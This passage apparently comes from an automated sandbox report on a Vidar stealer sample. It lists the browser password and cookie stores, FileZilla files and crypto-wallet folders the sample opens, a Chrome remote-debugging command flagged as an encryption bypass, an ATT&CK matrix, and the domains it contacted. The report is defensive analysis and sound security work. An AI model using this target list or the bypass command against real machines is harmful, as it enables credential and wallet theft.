                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Procedures.comBinary or memory string: WIN_81
                Source: Procedures.comBinary or memory string: WIN_XP
                Source: Procedures.com.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Procedures.comBinary or memory string: WIN_XPe
                Source: Procedures.comBinary or memory string: WIN_VISTA
                Source: Procedures.comBinary or memory string: WIN_7
                Source: Procedures.comBinary or memory string: WIN_8
                Source: Yara matchFile source: 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Procedures.com PID: 1576, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Attempt to bypass Chrome Application-Bound Encryption
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 11.2.Procedures.com.3fb0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3156069871.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Procedures.com PID: 1576, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00EA2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00EA2263
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00EA1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_00EA1C61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API                		2
                Valid Accounts                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Registry Run Keys / Startup Folder                		1
                Extra Window Memory Injection                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares21
                Input Capture                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		1
                DLL Side-Loading                		NTDS27
                System Information Discovery                		Distributed Component Object Model3
                Clipboard Data                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Extra Window Memory Injection                		LSA Secrets1
                Query Registry                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                Process Injection                		111
                Masquerading                		Cached Domain Credentials121
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                Registry Run Keys / Startup Folder                		2
                Valid Accounts                		DCSync1
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Virtualization/Sandbox Evasion                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579620 Sample: trZG6pItZj.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 65 toptek.sbs 2->65 67 t.me 2->67 69 2 other IPs or domains 2->69 91 Suricata IDS alerts for network traffic 2->91 93 Found malware configuration 2->93 95 Multi AV Scanner detection for submitted file 2->95 97 5 other signatures 2->97 10 trZG6pItZj.exe 30 2->10         started        13 msedge.exe 2->13         started        15 msedge.exe 2->15         started        signatures3 process4 file5 63 C:\Users\user\AppData\Local\Temp\Lp, DOS 10->63 dropped 17 cmd.exe 2 10->17         started        21 msedge.exe 13->21         started        24 msedge.exe 13->24         started        26 msedge.exe 13->26         started        28 msedge.exe 15->28         started        process6 dnsIp7 61 C:\Users\user\AppData\...\Procedures.com, PE32 17->61 dropped 89 Drops PE files with a suspicious file extension 17->89 30 Procedures.com 29 17->30         started        34 cmd.exe 2 17->34         started        36 conhost.exe 17->36         started        38 7 other processes 17->38 71 sb.scorecardresearch.com 18.165.220.110, 443, 49944 MIT-GATEWAYSUS United States 21->71 73 20.110.205.119, 443, 50009 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 21->73 75 16 other IPs or domains 21->75 file8 signatures9 process10 dnsIp11 83 t.me 149.154.167.99, 443, 49739 TELEGRAMRU United Kingdom 30->83 85 toptek.sbs 94.130.188.57, 443, 49745, 49754 HETZNER-ASDE Germany 30->85 87 127.0.0.1 unknown unknown 30->87 101 Attempt to bypass Chrome Application-Bound Encryption 30->101 103 Found many strings related to Crypto-Wallets (likely being stolen) 30->103 105 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 30->105 107 3 other signatures 30->107 40 msedge.exe 2 10 30->40         started        43 msedge.exe 30->43         started        45 chrome.exe 8 30->45         started        48 cmd.exe 30->48         started        signatures12 process13 dnsIp14 99 Monitors registry run keys for changes 40->99 50 msedge.exe 40->50         started        52 msedge.exe 43->52         started        79 192.168.2.5, 443, 49703, 49739 unknown unknown 45->79 81 239.255.255.250 unknown Reserved 45->81 54 chrome.exe 45->54         started        57 conhost.exe 48->57         started        59 timeout.exe 48->59         started        signatures15 process16 dnsIp17 77 www.google.com 142.250.181.132, 443, 49790, 49792 GOOGLEUS United States 54->77

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                trZG6pItZj.exe18%ReversingLabs
                trZG6pItZj.exe27%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\139308\Procedures.com0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\Lp0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                chrome.cloudflare-dns.com
                		172.64.41.3
                		truefalse
                  		high
                  toptek.sbs
                  		94.130.188.57
                  		truefalse
                    		high
                    t.me
                    		149.154.167.99
                    		truefalse
                      		high
                      ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                      		94.245.104.56
                      		truefalse
                        		high
                        sb.scorecardresearch.com
                        		18.165.220.110
                        		truefalse
                          		high
                          www.google.com
                          		142.250.181.132
                          		truefalse
                            		high
                            googlehosted.l.googleusercontent.com
                            		142.250.181.65
                            		truefalse
                              		high
                              clients2.googleusercontent.com
                              		unknown
                              		unknownfalse
                                		high
                                bzib.nelreports.net
                                		unknown
                                		unknownfalse
                                  		high
                                  assets.msn.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    c.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      ntp.msn.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        ZWVyoKcTcBhhzV.ZWVyoKcTcBhhzV
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          api.msn.com
                                          		unknown
                                          		unknownfalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            https://sb.scorecardresearch.com/b?rn=1734931474877&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=2DB99B69D85C6DF817C28E37D9F46CAD&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                              		high
                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931481529&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabProcedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drfalse
                                                    		high
                                                    https://google-ohttp-relay-join.fastly-edge.com/.chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ntp.msn.com/_defaultQuotaManager.24.drfalse
                                                          		high
                                                          http://anglebug.com/4633chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://anglebug.com/7382chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drfalse
                                                                		high
                                                                https://google-ohttp-relay-join.fastly-edge.com/;chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://issuetracker.google.com/284462263msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://google-ohttp-relay-join.fastly-edge.com/8chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.24.drfalse
                                                                        		high
                                                                        https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.24.drfalse
                                                                          		high
                                                                          https://deff.nelreports.net/api/reportReporting and NEL.26.drfalse
                                                                            		high
                                                                            https://google-ohttp-relay-join.fastly-edge.com/Achrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://polymer.github.io/AUTHORS.txtchrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://docs.google.com/manifest.json0.24.drfalse
                                                                                    		high
                                                                                    https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.youtube.com5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                        		high
                                                                                        https://google-ohttp-relay-join.fastly-edge.com/Dchrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://google-ohttp-relay-join.fastly-edge.com/Kchrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.26.drfalse
                                                                                              		high
                                                                                              https://anglebug.com/7714chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.instagram.com5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drfalse
                                                                                                  		high
                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/Nchrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://photos.google.com?referrer=CHROME_NTPchrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.google.com/chrome/tips/chrome.exe, 0000000F.00000003.2549336556.0000327000F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2579210853.0000327000F8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://google-ohttp-relay-join.fastly-edge.com/Uchrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/6248chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
